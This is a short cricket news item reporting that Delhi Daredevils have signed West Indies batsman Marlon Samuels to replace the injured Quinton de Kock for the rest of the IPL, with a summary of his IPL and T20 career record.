Delhi Daredevils have signed West Indies batsman Marlon Samuels as Quinton de Kock’s replacement for the remainder of the IPL. Samuels will join the squad on Saturday.
De Kock had been ruled out of the IPL with an injury to his right index finger he picked up during the New Zealand tour last month.
Samuels was among the unsold players in the IPL auction this year, with a base price of INR 100 lakhs. He last played in the IPL over four years ago, in 2013 for the now defunct Pune Warriors. In 2012, he played eight matches for them to score a total of 124 runs and took eight wickets. In 2013, he featured in only two matches, with scores of 5 and 3, and only one wicket to his name.
Samuels’ Impressive T20 Record
His overall T20 record is more impressive though. In 149 matches since his debut in 2006, he has scored 3757 runs at an average of 32.66; and a strike rate of 117.51, with two hundreds to his name. He has also taken 68 wickets with an economy rate of 7.01.
He played the recent four-match T20I series against Pakistan but made only 91 runs. Prior to that, Samuels also represented Peshawar Zalmi last month in the Pakistan Super League. Samuels has won the World T20 twice with West Indies and was named the player of the match in the final on both occasions.
